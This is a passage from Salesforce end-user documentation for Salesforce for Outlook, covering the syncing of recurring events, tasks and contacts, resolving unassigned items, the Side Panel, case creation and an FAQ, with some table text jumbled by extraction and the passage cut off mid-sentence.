Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Recurring Events”

In addition, “Read” and “Edit” on events, and event sync
direction set to any of the following directions.

Outlook to salesforce.com,

Salesforce.com to Outlook, or

Sync both ways

To sync recurring events between Outlook and Salesforce:

If your organization is set up to sync recurring events, you can keep them synced between Outlook and Salesforce using
Salesforce for Outlook. You can sync recurrences with the following patterns.

• Daily

• Weekly

• Monthly

• Yearly

After you sync recurring events to Salesforce, you can assign the recurrences to related records, such as contacts, accounts,
opportunities, and so on. Syncing recurring events also helps you maintain an accurate view of your availability when you create
events and request meetings from your Salesforce calendar.

Recurring events do not appear on the My Unresolved Items page. Instead, you can go directly to the recurring events in your
calendar to associate the recurring events with Salesforce records.

Understanding Differences Between Outlook and Salesforce

Recurring events work differently between Outlook and Salesforce.

You should know thatFor

If your recurrences include more than 100 occurrences, Salesforce for Outlook creates the series
with 100 occurrences in Salesforce.

After the dates of occurrences pass, Salesforce for Outlook then automatically adds another group
of occurrences, bringing the total future occurrences up to 100 again. The schedule on which

Ranges of occurrences

Salesforce adds these groups depends on the number of occurrences that passed and when you
last synced, as well as whether you changed any existing occurrences.

Salesforce for Outlook doesn’t support the Outlook recurrence pattern option weekend day.Monthly occurrences

Salesforce for Outlook lets you set up events that recur every year. If you enter a number other
than 1 for the Recur every option in Outlook recurrence patterns, Salesforce for Outlook won’t

Yearly occurrences
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You should know thatFor

sync the recurring series. This mean that you can set up yearly recurrences, but not recurrences
for every other year or every three years.

In addition, Salesforce for Outlook doesn’t support the Outlook recurrence pattern option
weekend day.

Salesforce doesn’t support recurring events lasting longer than 24 hours.Events lasting longer
than 24 hours

Modifying Recurring Series

You can modify recurring series, but it’s good to know what to avoid, so that you won’t lose any details for occurrences that
you’ve individually modified.

You should know thatIf you modify

Those changes won’t propagate to individually modified occurrences in Salesforce.

For example, you modify the appointment time of an occurrence, and then later modify the
appointment time for the entire series. The appointment time modification for the series won’t
propagate to the one modified occurrence.

Recurring series in
Outlook

Critical changes include modifications to:

• Appointment times
• Recurrence patterns
• Ranges of occurrences

If you make critical changes to recurring series, individually modified occurrences lose their
modifications.

Salesforce doesn’t support modifications to start dates that already occurred.Start dates for recurring
series in Outlook

This is a critical change in Outlook, and will clear any modifications you make to individual
occurrences within the series. Those modifications won’t propagate to Outlook. You can, however,

End dates for recurring
series in Salesforce

modify end dates in Outlook, but that type of critical change will clear all modifications you’ve
made to individual occurrences—in both Outlook and Salesforce.

Individual occurrences
• You may lose those changes if you make critical changes to the recurring series.
• If you delete an occurrence, and then move the following occurrence into its place,

Salesforce for Outlook doesn’t update Salesforce correctly. Instead, the occurrence you deleted
in Outlook remains in Salesforce along with the occurrence you moved into its place.

For example, you change your recurring event in Outlook. You delete the October 4th
occurrence, and move the October 5th occurrence into its place. In Salesforce, you’ll see two
occurrences on October 4th: the one you deleted, and the one you moved into its place. For
October 5th, you’ll have no occurrences.
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You should know thatIf you modify

• Outlook modifications propagate to occurrences in Salesforce, regardless of whether the ones
in Salesforce include critical modifications. Deleted occurrences in Salesforce, however, remain
deleted, and aren’t replaced with individually modified occurrences from Outlook.

See Also:
Syncing with Salesforce for Outlook
Resolving Your Synced Outlook Events
Syncing Events with Salesforce for Outlook

Syncing Tasks with Salesforce for Outlook

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” and “Edit” on tasks, and task sync direction set to
Outlook to salesforce.com

To sync tasks from Outlook to Salesforce:

”Read” and “Edit” on tasks, and task sync direction set to
Salesforce.com to Outlook

To sync tasks from Salesforce to Outlook:

”Read” and Edit” on tasks, and task sync direction set to Sync
both ways

To sync tasks both ways:

You can keep your Outlook and Salesforce tasks in sync using Salesforce for Outlook. Once a task is in Salesforce, you can
assign it to related records, like contacts, accounts, opportunities, and so on.

Which Tasks Sync

Your Outlook configuration defines which items are set to sync, which direction the data flows between Outlook and
Salesforce, and what happens when data conflicts. The task filters in your configuration determine which tasks sync.
The possible filters are:
• TODAY—Syncs tasks that are due on or after today. The start time is 12:00 a.m.

• LAST MONTH—Syncs tasks that were due on or after the first day of last month.

• LAST N DAYS—Syncs tasks that were due on or after a specified number of days ago, such as LAST 30 DAYS.

Task updates stop syncing once the task falls outside of the range you're configured to sync.

Recurring tasks and items flagged for follow-up on your Outlook To-Do list don't sync. Salesforce for Outlook syncs
tasks based on their due dates.
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How We Match Tasks

When tasks first sync, we link them with existing tasks that have the same subject and due date. If you don't assign due
dates to tasks, we link them using the same subject only.

How You Assign Tasks to Salesforce Records

After a task is added to Salesforce, you can assign it to other records using the My Unresolved Items page or the Related
To and Name fields on the task record. The task is added to the associated record's Activity History or Open Activities
related list. You can't save changes if your tasks have a required custom field or an activity custom field becomes required
after items are added to your unresolved tasks list.

Excluding Certain Records from Syncing

If you chose the Automatic option for your sync method, you have a couple of options for excluding certain items from syncing
with Salesforce for Outlook.

• You can choose to sync items you mark as Private in Microsoft® Outlook®. If you don’t want to sync private items, open
Salesforce for Outlook Settings, and deselect the types of private items you don’t want to sync.

• If you don’t want certain Outlook items to sync, regardless of whether they’re marked as Private, assign them to the category
Don’t Sync with Salesforce in Outlook. For details on using categories in Outlook, refer to your Outlook documentation.

See Also:
Syncing with Salesforce for Outlook
Resolving Your Synced Outlook Tasks

Automatic Account Assignments for Synced Contacts

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accounts and “Edit” on contactsTo assign accounts:

“Create” on accounts and “Edit” on contacts

AND

“Show Quick Create”

To create new accounts:

After syncing contacts from Outlook, Salesforce for Outlook tries to automatically assign them to accounts, as shown in this
diagram.
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This table describes the account assignment process.

ThenIf

The contact is assigned to that account.A contact's company matches a single Salesforce account

The contact is sent to My Unresolved Items in Salesforce,
which you can access from the Contact home page or the

A contact's company matches many Salesforce accounts or
none

Salesforce for Outlook system tray application. You can use
this list to manually assign contacts to existing accounts, create
new accounts, or confirm that contacts are private.

The contact is treated as a private contact and is not sent to
My Unresolved Items.

A contact doesn't have a company name

If a matching account is found in Salesforce, the contact is
assigned to that account. Otherwise, the contact is sent to My
Unresolved Items to be resolved.

A contact's company changes in Outlook
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ThenIf

The contact is removed from My Unresolved Items the next
time you open the list.

An unresolved contact is deleted in Outlook

The contact record is updated in My Unresolved Items. If the
contact's company changes, Salesforce checks to see if that

An unresolved contact is changed in Outlook

information matches any existing accounts and assigns it to
an account if it finds a match.

See Also:
Syncing Contacts with Salesforce for Outlook
Resolving Your Synced Outlook Contacts
Managing Your Salesforce for Outlook Configuration

Adding Email with Salesforce for Outlook
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Email to Salesforce” AND

“Add Email”

To add Outlook emails to Salesforce:

“Always save email attachments” in Email to Salesforce settingsTo add email attachments to Salesforce:

From Microsoft® Outlook®, you can manually add emails to Salesforce. When you add emails, Salesforce receives the emails
and, based on your My Email to Salesforce settings, adds them to either the Activity History related list of matching records
or the My Unresolved Items page, where you can manually assign them. Unresolved emails also appear in your open task list.

If Salesforce can’t match any email addresses for recipients that appear in the To and Cc fields of emails you add to Salesforce,
the My Unresolved Items page displays one row for each email.

Tip:  Save time from having to assign the emails waiting for you in My Unresolved Items. When your administrator
enables the Salesforce Side Panel, which appears directly in Outlook, you can add emails to the Salesforce contacts
of your choice. Learn more in Viewing Salesforce Records in Microsoft® Outlook®.

Adding Emails from Your Inbox

You can add up to 10 sent or received emails simultaneously. Keep in mind that you can’t add other mail items, such as meeting
invitations or meeting updates.

1. In Outlook, select the emails you want to add.
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2. Click Add Emails.

Sending and Adding New Emails

When you compose new emails, you can send and add them to Salesforce simultaneously.

1. In Outlook, compose a new email.

2. Click Send and Add.

Email Association Features

• Salesforce for Outlook adds the email to Salesforce for each recipient. For each unresolved email address, My Unresolved
Items displays a separate row. This gives you the opportunity to assign email to all of the contacts and leads in that email.

• For each email you add to Salesforce, Salesforce for Outlook assigns the Outlook category Added to Salesforce. This makes
it easy to search for emails you added to Salesforce.

• In My Email to Salesforce, you can specify email domains you want to exclude when using Salesforce for Outlook to add
emails to Salesforce. For example, you can exclude your own email domain so that Salesforce for Outlook won’t associate
emails to contacts with your email domain. This can be especially helpful for organizations that create contacts for internal
users, and don’t want emails associated with those users.

• For each email task, Salesforce for Outlook stores the original date of the email in the Due Date field.
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• If Email to Salesforce matches an email address to multiple lead or contact records in Salesforce, you can choose to associate
the email with all matching records, the oldest record, or the record with the most activity.

• If you selected leads or contacts, you can select If no matching records are found, create a task and
send it to My Unresolved Items to have the email sent to My Unresolved Items if no matching records are found.
If this checkbox isn’t selected and Salesforce can’t identify the email addresses in the To or From fields, the email won't
be saved in Salesforce.

See Also:
Adding Microsoft® Outlook® Emails to Salesforce Records
Editing Your Salesforce for Outlook Email Settings
Using the Salesforce for Outlook System Tray Application
My Unresolved Items Overview

My Unresolved Items Overview
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

When you use Salesforce for Outlook to sync items and add emails from Microsoft Outlook to Salesforce, any items that
Salesforce for Outlook can’t automatically assign to Salesforce records appear on the My Unresolved Items page. As part of
your daily routine, you’ll use this page to manage the unresolved items that require your attention. Recurring events do not
appear on the My Unresolved Items page. Instead, you can go directly to the recurring events in your calendar to associate the
recurring events with Salesforce records.

1. Easily access the My Unresolved Items page using either the Unresolved Items shortcut on the sidebar, or the home page
links for unresolved tasks and events.

2. Quickly review unassigned items by type using the tabs Contacts, Events, and Tasks.
3. View your unassigned items.
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4. Assign your items to Salesforce records—either manually or using Salesforce recommendations—or confirm you want to
leave them unassigned.

Using Features that Make Resolving Items Easy

The following features help you resolve items quickly and easily.

This feature helps you save time becauseUse the featureTo

You can assign up to 50 items in any one queue simultaneously.Batch EditAssign multiple
items
simultaneously

Salesforce provides recommendations for accounts, cases, and opportunities to
which you can assign your items. If you don't want to see these recommendations,

RecommendationsHave Salesforce
provide
recommendations click the Turn off Recommendations link. If you change your mind, click the

Turn on Recommendations link.

Recommendations display only when you select a contact from the lookup and
the related list is empty. Salesforce displays recommendations based on the
following criteria.

• Accounts: The contact has either an account as the parent, or a contact role
in the account.

• Cases: The contact is related to the case.

• Opportunities: The contact has a contact role in the opportunity.

See Also:
Resolving Your Synced Outlook Tasks
Resolving Your Synced Outlook Contacts
Resolving Your Synced Outlook Events
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Resolving Your Synced Outlook Contacts

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on contacts and “Read” on accounts

AND

Sync enabled for contacts

To view or edit unresolved contacts:

“Edit” on contacts and “Create” on accounts

AND

“Show Quick Create”

To create new accounts:

When contacts sync from Outlook with Salesforce for Outlook, some are automatically assigned to accounts based on their
company. The rest are added to My Unresolved Items, where you can either assign contacts to Salesforce accounts or confirm
that you want to leave them unassigned.

1. Access your unresolved contacts from the sidebar shortcut Unresolved Items.
2. Resolve each contact in any of these ways.

• Assign an account.

◊ Select an account under Choose Suggested Account in the drop-down list. We suggest accounts only if we detect
possible matches based on the contact's company. Suggested accounts always show the Account Name field and
the first three additional fields defined in your account search layout. If your organization has contact lookup filters
that prevent certain accounts from being assigned to contacts, those accounts won’t appear as suggested accounts
and can’t be assigned to contacts.

◊ Select Search Salesforce.com.... In the lookup, either click New, enter account information, and click
Save, or enter search criteria, click Go!, and click the right account. If you don't see the lookup, you may need to
first allow popups from Salesforce.

• Leave unassigned—Select Don't Assign New Account from the drop-down list if you want to confirm that a
contact with no account should remain unassigned. Unassigned contacts aren't related to Salesforce records and are
visible to you and your administrator only.

• Choose an account if there's a conflict—If the Outlook and Salesforce contacts' companies are different, click Don't
Assign New Account in the drop-down list to overwrite one with the other. The Salesforce account overwrites
the Outlook company if Salesforce is set to win, and Outlook overwrites the Salesforce account if Outlook is set to
win.

• Cancel a selection—Select —None Selected— from the drop-down list.

3. Click Save to save your changes. All modified items are removed from the list. Remaining items continue to sync, and you
can return any time to resolve them. Clicking Cancel cancels all changes on the page. Every contact assigned to an account
now appears on the Contacts related list for that account.
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Note:  You can also resolve a contact from the contact record by marking it private or by assigning it to an account.

Your unresolved contacts list works like a standard list view. Click Edit or Create New View to define filters and
customize columns.

See Also:
My Unresolved Items Overview
Syncing Contacts with Salesforce for Outlook

Resolving Your Synced Outlook Events

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on events and “Read” on the objects you assign to events

AND

Sync enabled for events

To view or edit unresolved events:

”Edit” on events

AND

“Show Quick Create” and “Create” on those objects

To create new Salesforce records:

“Lookup Auto-Completion” in Search SettingsTo see recently used data in the related records fields:

When non-recurring events sync from Outlook with Salesforce for Outlook, they appear in your Salesforce calendar and on
the My Unresolved Items page. Use this page to either assign events to related Salesforce records or confirm that you want to
leave them unassigned.

Note: Recurring events do not appear on the My Unresolved Items page. Instead, you can go directly to the recurring
events in your calendar to associate the recurring events with Salesforce records.

1. Access your unresolved events from the sidebar shortcut Unresolved Items.
2. Depending on how you want to resolve an event, choose either of these actions.

• Assign to related records—Enter a related record in one or both fields. If you need to, first select the correct record
type from the drop-down list. If you assign a lead, you can’t assign additional records. Clear an entry to cancel an
assignment.

• Leave unassigned—Click Don’t Assign. Unassigned events, such as internal meetings or personal appointments, aren’t
linked to any other records and are visible to you only.

3. Click Save to save your changes. All modified items are removed from the list. Remaining items continue to sync, and you
can return any time to resolve them. Clicking Cancel cancels all changes on the page. The event is added to the associated
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record’s Activity History or Open Activities related list. You can’t save changes if your events have a required custom field
or an activity custom field becomes required after items are added to your unresolved events list.

Note:  You can also resolve an event from the event record by marking it private or by assigning it to other Salesforce
records using the Related To and Name fields. Assigned and private events are automatically removed from your
unresolved events list. Click  next to the subject to see an event’s description.

See Also:
My Unresolved Items Overview
Syncing Events with Salesforce for Outlook

Resolving Your Synced Outlook Tasks

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on tasks and “Read” on the objects you assign to tasks

AND

Sync enabled for tasks

To view or edit unresolved tasks:

”Edit” on tasks

AND

“Show Quick Create” and “Create” on those objects

To create new Salesforce records:

“Lookup Auto-Completion” in Search SettingsTo see recently used data in the related records fields:

When tasks sync from Outlook with Salesforce for Outlook, they appear on the My Unresolved Items page. Use this page to
either assign tasks to related Salesforce records or confirm that you want to leave them unassigned.

1. Access your unresolved tasks from the sidebar shortcut Unresolved Items.
2. Depending on how you want to resolve a task, choose either of these actions.

• Assign to related records—Enter a related record in one or both fields. If you need to, first select the correct record
type from the drop-down list. If you assign a lead, you can't assign additional records. Clear an entry to cancel an
assignment.

• Leave unassigned—Click Don't Assign. Unassigned tasks, such as internal meetings or personal appointments, aren't
linked to any other records and are visible to you only.

3. Click Save to save your changes. All modified items are removed from the list. Remaining items continue to sync, and you
can return any time to resolve them. Clicking Cancel cancels all changes on the page. The task is added to the associated
record's Activity History or Open Activities related list. You can't save changes if your tasks have a required custom field
or an activity custom field becomes required after items are added to your unresolved tasks list.
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Note:  You can also resolve a task from the task record by assigning it to other Salesforce records using the Related
To and Name fields. Assigned tasks are automatically removed from your unresolved tasks list.

See Also:
My Unresolved Items Overview
Syncing Tasks with Salesforce for Outlook

Viewing Salesforce Records in Microsoft® Outlook®

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Side Panel”To display the Salesforce Side Panel in Outlook:

“Email to Salesforce” AND “Add Email”To add Outlook emails to Salesforce records:

“Always save email attachments” in Email to Salesforce settingsTo add email attachments to Salesforce:

“Allow Users to Relate Multiple Contacts to Tasks and
Events” in Activity Settings

To add emails to multiple contacts:

Watch a Demo: Using the Salesforce Side Panel to Work with Records in Microsoft® Outlook® (2:18 minutes)

When you select emails in Outlook, the Salesforce Side Panel displays related Salesforce contact and lead details directly in
Outlook. Before you can use the side panel, you need to install Salesforce for Outlook v2.2.0 or later, and have your Salesforce
administrator enable the side panel in your Outlook configuration. After it’s enabled, the side panel displays up to four contacts
and leads from your email’s From, To, and Cc fields.

In addition, the Salesforce Side Panel:

• Displays as many as four activities, opportunities, and cases, related to the contacts and leads that appear in the side panel.

• Makes it easy to manually add an email to multiple contacts, and to one other record with which you can associate tasks,
such as an account, a case, or an opportunity.

• Discovers duplicate contacts or leads. You choose the most appropriate ones to display in the side panel.

• Includes a Search feature to find additional Salesforce records.

• Includes links to view full record details directly in Salesforce.

Here’s how you’ll use the side panel.
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1. Select an email in Outlook.
2. Review the Salesforce content that appears in the side panel, which displays contacts and leads based on the order they

appear in your email’s From, To, and Cc fields. For each contact and lead, it’s easy to view related activities, opportunities,
and cases. If you want to view full record details, just click on a record’s link to open it directly in Salesforce.

To add your email to the Salesforce records of your choice, click  next to those records.

If you have the Social Accounts and Contacts feature enabled in Salesforce, the side panel displays either Facebook® or
Twitter™ profile photos—whichever ones you chose to show in Salesforce for those contacts and leads.

3. Select the other contacts and leads related to your email to view their details, along with related activities, cases, and
opportunities.

4. Quickly see the Salesforce records to which you’ve added emails. If you don’t see records you’re looking for, click  to find
other records, and then add emails to them. There’s even a collapse feature (  ) to hide the side panel.

Considerations for Using the Salesforce Side Panel

If you’ve been using Salesforce for Outlook and the Salesforce Side Panel is new to you, take a look at these details so that you
know what changes to expect.

• After your administrator enables the side panel, the Add Emails button no longer appears in Outlook. Instead, you’ll click
 directly on the side panel to add emails to Salesforce records.

Keep in mind that the Send and Add button no longer appears in individual Outlook emails that you send. But when you
select emails in the Sent Items folder, it’s easy to add them the same way you add received emails.

• Supported browsers include Microsoft Internet Explorer® 8 or later.
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• Opportunities associated with person accounts do not appear in the side panel, unless you manually add contact roles on
the opportunities.

See Also:
Adding Microsoft® Outlook® Emails to Salesforce Records
Searching for Salesforce Records in Microsoft® Outlook®

Adding Microsoft® Outlook® Emails to Salesforce Records

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Side Panel”To display the Salesforce Side Panel in Outlook:

“Email to Salesforce” AND “Add Email”To add Outlook emails to Salesforce records:

“Always save email attachments” in Email to Salesforce settingsTo add email attachments to Salesforce:

“Allow Users to Relate Multiple Contacts to Tasks and
Events” in Activity Settings

To add emails to multiple contacts:

You’ll complete this procedure using the Salesforce Side Panel, a feature that’s available in Salesforce for Outlook v2.2 and
later. If you’re not yet familiar with the side panel, learn about it in Viewing Salesforce Records in Microsoft® Outlook®.

1. In Outlook, select an email you want to add to Salesforce records. You can add an email to multiple contacts, and to one
other record with which you can associate tasks, such as an account, a case, or an opportunity.

2. In the Salesforce Side Panel, click  for the contact, account, case, opportunity, or lead to which you want to add the
email. The side panel displays the Salesforce records to which you added your email.

See Also:
Searching for Salesforce Records in Microsoft® Outlook®

Removing Microsoft® Outlook® Emails from Salesforce Records

1335

Viewing Salesforce Records in Microsoft® Outlook®Using Salesforce-Integrated Email



Removing Microsoft® Outlook® Emails from Salesforce Records

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Side Panel”To display the Salesforce Side Panel in Outlook:

“Email to Salesforce” AND “Add Email”To add Outlook emails to Salesforce records:

“Always save email attachments” in Email to Salesforce settingsTo add email attachments to Salesforce:

“Allow Users to Relate Multiple Contacts to Tasks and
Events” in Activity Settings

To add emails to multiple contacts:

You’ll complete this procedure using the Salesforce Side Panel, a feature that’s available in Salesforce for Outlook v2.2 and
later. If you’re not yet familiar with the side panel, learn about it in Viewing Salesforce Records in Microsoft® Outlook®.

1. In Outlook, select the email you want to remove from Salesforce records.
2. In the Salesforce Side Panel, find the Salesforce record from which you want to remove the email. The upper section of

the side panel displays the records to which you’ve already added your email.

3. With your mouse, hover over , which turns to , then click it to remove your email from the Salesforce record. The
side panel displays updates for the remaining Salesforce records to which you’ve added your email.

See Also:
Adding Microsoft® Outlook® Emails to Salesforce Records
Searching for Salesforce Records in Microsoft® Outlook®
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Searching for Salesforce Records in Microsoft® Outlook®

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Side Panel”To display the Salesforce Side Panel in Outlook:

“Email to Salesforce” AND “Add Email”To add Outlook emails to Salesforce records:

“Always save email attachments” in Email to Salesforce settingsTo add email attachments to Salesforce:

“Allow Users to Relate Multiple Contacts to Tasks and
Events” in Activity Settings

To add emails to multiple contacts:

You’ll complete this procedure using the Salesforce Side Panel, a feature that’s available in Salesforce for Outlook v2.2 and
later. If you’re not yet familiar with the side panel, learn about it in Viewing Salesforce Records in Microsoft® Outlook®.

When you’re viewing details that appear in the Salesforce Side Panel, you may want to search for additional Salesforce records.
Search results display contacts and any other records with which you can associate tasks, such as a campaign, a case, or an
opportunity.

1. From Outlook, select an email for which you want to display additional Salesforce records.
2. In the side panel, click .
3. Type your search term. For example, if you want to search for Salesforce records related to desktops, type desktop.

4. Click the search icon to display Salesforce records related to your search term.

See Also:
Viewing Salesforce Records in Microsoft® Outlook®

Adding Microsoft® Outlook® Emails to Salesforce Records

1337

Viewing Salesforce Records in Microsoft® Outlook®Using Salesforce-Integrated Email



Creating Cases with Salesforce for Outlook
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Always save email attachments” in your Email to Salesforce
settings

AND

”Add Email” in your Salesforce for Outlook Configuration

To include email attachments when you create cases:

If you don’t see the Create Cases drop-down list button in Microsoft® Outlook®, contact your administrator, who can enable
this feature.

If you track cases in Salesforce, you can create new ones from your Microsoft® Outlook® emails. Your administrator needs to
first create Email-to-Case destinations that appear in the drop-down list button Create Cases in Outlook. For each destination,
you can choose the assignee, which can be either individual users or queues. When you create cases, you can add up to ten
emails simultaneously for each destination.

1. In Outlook, select up to 10 sent or received emails and click Create Cases.
2. Select a destination from the drop-down list. Salesforce for Outlook adds the emails you selected as a case in Salesforce.

See Also:
Editing Your Salesforce for Outlook Email Settings
Using the Salesforce for Outlook System Tray Application
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Salesforce for Outlook FAQ
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

QuestionsCategory

What’s the difference between private items in both Salesforce and Microsoft® Outlook®?General Salesforce for Outlook
Questions

Where does Salesforce for Outlook install on my system?Installing
Salesforce for Outlook

Can I have Salesforce for Outlook and Connect for Outlook installed at the same time?

Does Salesforce for Outlook support terminal servers?

Why is my Salesforce for Outlook installation failing on the prerequisites screen?

Why can't I log in to Salesforce for Outlook?Configuring
Salesforce for Outlook

Can I map to a custom Outlook field using Salesforce for Outlook?

Can I mass configure Salesforce for Outlook?

Can I use filter logic in Salesforce for Outlook data sets?

Can I use Outlook categories to indicate what I want Salesforce for Outlook to sync?

How do I exclude certain items from syncing with Salesforce for Outlook?

Can I sync person accounts using Salesforce for Outlook?Syncing with
Salesforce for Outlook

Can I sync recurring items with Salesforce for Outlook?

Can I add cases using Salesforce for Outlook?

Can I associate Outlook records to custom objects using Salesforce for Outlook?

Can I use Outlook categories to indicate what I want Salesforce for Outlook to sync?Selecting Records to Sync

How do I exclude certain items from syncing with Salesforce for Outlook?

Why does Salesforce for Outlook create duplicate records in Microsoft® Outlook®?Managing Synced Records

Why does Salesforce for Outlook create duplicate contacts in Salesforce and Microsoft®

Outlook®?

Why does Salesforce for Outlook delete my Outlook records after I sync?

Why isn’t Salesforce for Outlook adding emails to the right contact or lead in Salesforce?Adding Emails to
Salesforce for Outlook

Why can’t I add emails to Salesforce?

Does Salesforce for Outlook support email attachments?
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QuestionsCategory

How do I enable contacts for sync in Salesforce for Outlook?Syncing Contacts

How does Salesforce for Outlook protect emails?Protecting Your Data

Does salesforce.com support single sign-on (SSO) for Salesforce for Outlook?

What security does Salesforce for Outlook use for usernames and passwords?

What’s the difference between private items in both Salesforce and
Microsoft® Outlook®?

Private items in Microsoft Outlook and Salesforce differ in ways you may not expect. The following table provides details you
should know before choosing whether to include private items when you sync between Outlook and Salesforce.

Private in SalesforcePrivate in OutlookItem

Only contacts that aren’t associated with accounts are
private and not visible to other Salesforce users, except

Others in your organization, with the exception of
your Exchange administrator, can’t see your
contacts.

Contacts

for users above that role in the hierarchy and
administrators, who can view, edit, and report on
contacts.

Contacts associated with accounts, however, are visible
to other Salesforce users.

Only blocks of time, and not event details, on your
calendar are visible to other Salesforce users, except for

Others in your organization, with the exception of
your Exchange administrator, can’t see your events.

Events

users above that role in the hierarchy and
administrators, who can view, edit, and report on
contacts.

Salesforce doesn’t include any means for keeping tasks
private. So other users in your organization, depending

Others in your organization, with the exception of
your Exchange administrator, can’t see your tasks.

Tasks

on their role in the hierarchy and administrators, can
see your tasks.

See Also:
Syncing Microsoft Outlook with Salesforce Using Salesforce for Outlook
Syncing with Salesforce for Outlook
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Where does Salesforce for Outlook install on my system?
When you install Salesforce for Outlook, the installer chooses the installation location based on whether you're running the
32-bit or 64-bit version of Microsoft® Outlook®.

The installer places program files inUsing the following installerOnIf you’re
running

C:\Program Files (x86)SalesforceForOutlook_x32.msi64-bit Microsoft Windows®

7
32-bit
Outlook

C:\Program FilesSalesforceForOutlook_x32.msi32-bit Windows 7,
Windows XP, or Windows
Vista®

C:\Program FilesSalesforceForOutlook_x64.msi or
SalesforceForOutlook.exe

64-bit Windows 764-bit
Outlook

See Also:
Syncing Microsoft Outlook with Salesforce Using Salesforce for Outlook
Installing and Setting Up Salesforce for Outlook

Can I have Salesforce for Outlook and Connect for Outlook installed at
the same time?

Yes, you can have both products installed, but for best performance, we recommend removing Connect for Outlook and using
only Salesforce for Outlook. To hide Connect for Outlook temporarily, right-click your Outlook toolbar and deselect Connect
for Outlook.

See Also:
Syncing Microsoft Outlook with Salesforce Using Salesforce for Outlook

Does Salesforce for Outlook support terminal servers?
No. Salesforce for Outlook does not support terminal servers, such as Citrix.

See Also:
Syncing Microsoft Outlook with Salesforce Using Salesforce for Outlook
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Why is my Salesforce for Outlook installation failing on the prerequisites
screen?

Your system may not meet all system requirements for Salesforce for Outlook. Verify your system meets these requirements,
then try installing Salesforce for Outlook again.

See Also:
Syncing Microsoft Outlook with Salesforce Using Salesforce for Outlook
Installing and Setting Up Salesforce for Outlook
Salesforce for Outlook System Requirements

Why can't I log in to Salesforce for Outlook?
Your inability to log in may be related to your company's IP address requirements. If your organization restricts IP addresses,
logins from untrusted IPs are blocked until they’re activated. Salesforce automatically sends you an activation email that you
can use to log in. The email contains a security token that you must add to the end of your password. For example, if your
password is mypassword, and your security token is XXXXXXXXXX, you must enter mypasswordXXXXXXXXXX to log in.

See Also:
Syncing Microsoft Outlook with Salesforce Using Salesforce for Outlook

Can I map to a custom Outlook field using Salesforce for Outlook?
Yes, you can map a Salesforce field to a custom Outlook field using Salesforce for Outlook. Under Field Mapping in a
configuration, select Custom Field... from the end of the corresponding Outlook Field picklist. Enter the field's
name and click OK.

The custom field must already exist in Outlook. Letters are not case-sensitive, and these characters aren't allowed: [, ], _, #.
The first sync validates that the custom Outlook field exists and then maps it to the Salesforce field. Custom Outlook fields
use a string data type. Note that we only allow custom fields for Salesforce text fields and non-restricted picklists.

See Also:
Editing Your Salesforce for Outlook Field Mappings
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Can I mass configure Salesforce for Outlook?
Yes, you can create a configuration in Salesforce and assign it to profiles or even specific users. When those users set up
Salesforce for Outlook, the configuration's settings are automatically deployed to Outlook.

See Also:
Managing Your Salesforce for Outlook Configuration

Can I use filter logic in Salesforce for Outlook data sets?
No, you can't use filter logic to limit which records your users sync using Salesforce for Outlook.

See Also:
Syncing with Salesforce for Outlook

Can I use Outlook categories to indicate what I want
Salesforce for Outlook to sync?

No, Salesforce for Outlook uses folders rather than categories to specify which items sync.

See Also:
Syncing with Salesforce for Outlook
Changing Your Salesforce for Outlook Sync Folders

How do I exclude certain items from syncing with Salesforce for Outlook?
If you chose the Automatic option for your sync method, you have a couple of options for excluding certain items from syncing
with Salesforce for Outlook.

• You can choose to sync items you mark as Private in Microsoft® Outlook®. If you don’t want to sync private items, open
Salesforce for Outlook Settings, and deselect the types of private items you don’t want to sync.

• If you don’t want certain Outlook items to sync, regardless of whether they’re marked as Private, assign them to the category
Don’t Sync with Salesforce in Outlook. For details on using categories in Outlook, refer to your Outlook documentation.

Otherwise, Salesforce for Outlook uses Microsoft® Outlook® folders to limit which records sync with Salesforce. Before you
complete the Salesforce for Outlook setup wizard, make sure the folders you want to sync contain the right records. If you’re
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syncing from Outlook to Salesforce, moving a record out of a synced Outlook folder deletes that record in Salesforce. If you’re
syncing from Salesforce to Outlook, removing a record from Salesforce deletes that record in Outlook.

See Also:
Syncing with Salesforce for Outlook
Changing Your Salesforce for Outlook Sync Folders

Can I sync person accounts using Salesforce for Outlook?
Yes. If person accounts have been implemented in your organization, Salesforce for Outlook can sync person accounts between
your Accounts tab in Salesforce and your contacts folder in Outlook.

You can create new person accounts in Salesforce and view, edit, and delete synced person accounts in Outlook or Salesforce.
Contacts synced from Outlook to Salesforce may be matched to person accounts.

Note:

A deleted person account will be recreated as a contact in Salesforce if:

• You update the related Outlook contact before the next sync, and

• Your configuration is set to sync both ways with Outlook winning.

See Also:
Syncing with Salesforce for Outlook

Can I sync recurring items with Salesforce for Outlook?
No, Salesforce for Outlook doesn't sync the following recurring items.

• Events or event attendees

• Tasks

See Also:
Syncing with Salesforce for Outlook
Syncing Recurring Events with Salesforce for Outlook Overview

1344

Salesforce for Outlook FAQUsing Salesforce-Integrated Email



Can I add cases using Salesforce for Outlook?
Yes, Salesforce for Outlook supports adding emails to Salesforce as cases.

See Also:
Creating Cases with Salesforce for Outlook
Setting Up Create Case for Salesforce for Outlook Users

Can I associate Outlook records to custom objects using
Salesforce for Outlook?

You can assign synced events and tasks to several different objects, including custom objects, but you can assign synced contacts
only to accounts.

See Also:
Syncing with Salesforce for Outlook

Why does Salesforce for Outlook create duplicate records in Microsoft®

Outlook®?
If you either mark items as Private or assign them to the Outlook category Don’t Sync with Salesforce, and you sync contacts,
